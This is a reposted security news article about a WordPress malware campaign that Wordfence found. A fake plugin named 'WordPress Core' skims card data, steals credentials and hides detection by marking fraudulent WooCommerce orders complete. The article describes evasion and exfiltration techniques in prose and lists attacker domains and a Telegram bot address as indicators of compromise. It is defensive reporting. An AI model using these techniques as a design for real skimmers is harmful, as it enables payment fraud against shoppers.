Source: www.infosecurity-magazine.com – Author:
A newly discovered malware campaign with highly sophisticated capabilities, including credit card skimming, credential theft and user profiling, has been identified by cybersecurity researchers.
According to the Wordfence Threat Intelligence Team, the malware, found on May 16 2025, was packaged as a rogue WordPress plugin and used novel anti-detection techniques, including a live backend system hosted on infected websites.
This method was not previously seen in WordPress-focused attacks.
Long-Running Operation with Evolving Tactics
The campaign appears to have been active since at least September 2023. Wordfence said it analyzed over 20 malware samples and found shared features across all variants, including obfuscation, anti-analysis techniques, developer tool detection and targeted execution.
For example, the malware avoids running on admin pages and instead activates only on checkout screens, sometimes checking for prior infections to avoid re-targeting the same users.
The most recent versions even included custom HTML overlays, fake payment forms and localized human verification challenges mimicking Cloudflare pages.
In many cases, stolen data was exfiltrated via Base64-encoded strings disguised as image URLs.
Malware Family Functions as a Modular Framework
This malware campaign was not limited to skimming. Researchers uncovered three additional variants with distinct objectives.
One variant manipulated Google Ads to serve fraudulent ads to mobile users, and another stole WordPress credentials. Meanwhile, a third distributed additional malware via link replacement. In all cases, the core framework remained consistent, with functionality adapted for each use case.
Some versions also used Telegram for real-time exfiltration and user action tracking.
Rogue Plugin Used as Malware Host
One of the most notable findings was a fake WordPress plugin named “WordPress Core.” While appearing legitimate on the surface, its components included JavaScript skimmers and PHP scripts that enabled attackers to manage stolen data directly from the infected website.
The plugin used WooCommerce hooks to mark fraudulent orders as completed, thereby delaying detection. Its backend infrastructure included a custom post type called “messages” that stored stolen payment data within WordPress itself.
Indicators of compromise (IoCs) include domain names such as api-service-188910982.website, graphiccloudcontent.com and api.telegram.org/bot[…]chat_id=-4672047987.
Original Post URL: https://www.infosecurity-magazine.com/news/rogue-wordpress-plugin-skim-credit/
Category & Tags: –
Views: 3
